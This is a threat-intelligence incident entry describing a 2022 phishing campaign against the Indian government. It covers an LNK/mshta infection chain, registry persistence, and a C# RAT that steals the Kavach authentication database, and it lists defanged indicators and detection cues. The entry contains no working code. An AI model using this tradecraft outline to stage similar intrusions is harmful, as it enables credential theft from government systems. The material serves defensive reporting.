Cyber Incident Victim: Government of India
Date:
Dec 2022
Location:
India
Summary
A cyberattack campaign attributed to the threat actor STEPPY#KAVACH targeted Indian government entities through phishing emails delivering a malicious ZIP archive containing a shortcut file (.LNK). The shortcut executed a remote HTA script via mshta.exe, initiating a multi-stage infection chain involving JScript payloads that downloaded a decoy PNG file, established persistence via registry keys, and deployed a C#-based remote access trojan (RAT). The RAT specifically sought to exfiltrate the "kavach.db" file, an authentication database tied to India's Kavach multi-factor authentication system, while enabling additional payload execution, screenshots, and command control via encrypted C2 communications. Infrastructure analysis revealed compromised Indian government-related websites for initial payload staging and German-hosted servers for C2 operations, with tactical overlaps to Pakistan-linked APT groups like SideCopy/APT36.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 2 actors | Available to members | Available to members |
Description
The incident involved a targeted cyberattack campaign by the threat actor STEPPY#KAVACH against Indian government employees, first observed in late 2022. Attackers initiated the compromise through phishing emails containing a ZIP archive ("11222022.zip") with a malicious shortcut file ("Scanimg.png.lnk") disguised as an image. Execution of this LNK file triggered mshta.exe to retrieve and run a remote HTA payload ("sit.hta") from the compromised Indian tax domain incometaxdelhi[.]org. The HTA file deployed JavaScript that verified the presence of .NET Framework 4.0.30319, downloaded a decoy PNG file ("8292.png") displaying a year-old Indian Ministry of Defence news article, and executed six JScript files. These scripts created directories ("C:\ProgramData\dvixm"), downloaded the RAT payload "mm1.exe" from IP 155.133.23[.]244, established persistence via a registry run key ("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"), and forced a system reboot to activate the malware. The attack chain exploited living-off-the-land binaries (LOLBins) like mshta.exe and PowerShell, with infrastructure leveraging compromised Indian government-affiliated domains and German-hosted C2 servers.
The final payload, "mm1.exe," was a C#-based remote access trojan compiled in December 2022, functioning as a reconnaissance and exfiltration tool. It specifically targeted the Kavach multi-factor authentication database ("kavach.db") located in the victim’s AppData\Roaming directory, indicating precise knowledge of Indian government security systems. The malware generated a unique victim ID using domain, username, and machine name, then communicated with C2 IP 155.133.23[.]244 over ports 3309-3311 using Triple-DES encryption with the static key "function_load." Capabilities included executing attacker-defined .exe/.vbs files, capturing screenshots, enumerating files, and exfiltrating data. Infrastructure analysis revealed connections to historical SideCopy/APT36 campaigns, including reused IPs redirecting to Indian government email portals (email.gov[.]in) and consistent use of German hosting providers like Contabo. The campaign’s focus on Kavach-related data and government-themed lures confirmed its objective of compromising Indian administrative credentials, with evidence suggesting operational continuity from at least March 2022. Detection methods included monitoring for mshta.exe network activity, specific file paths (e.g., ProgramData\mm1.exe), and C2 IPs, though no victim-side containment actions were detailed in the reporting.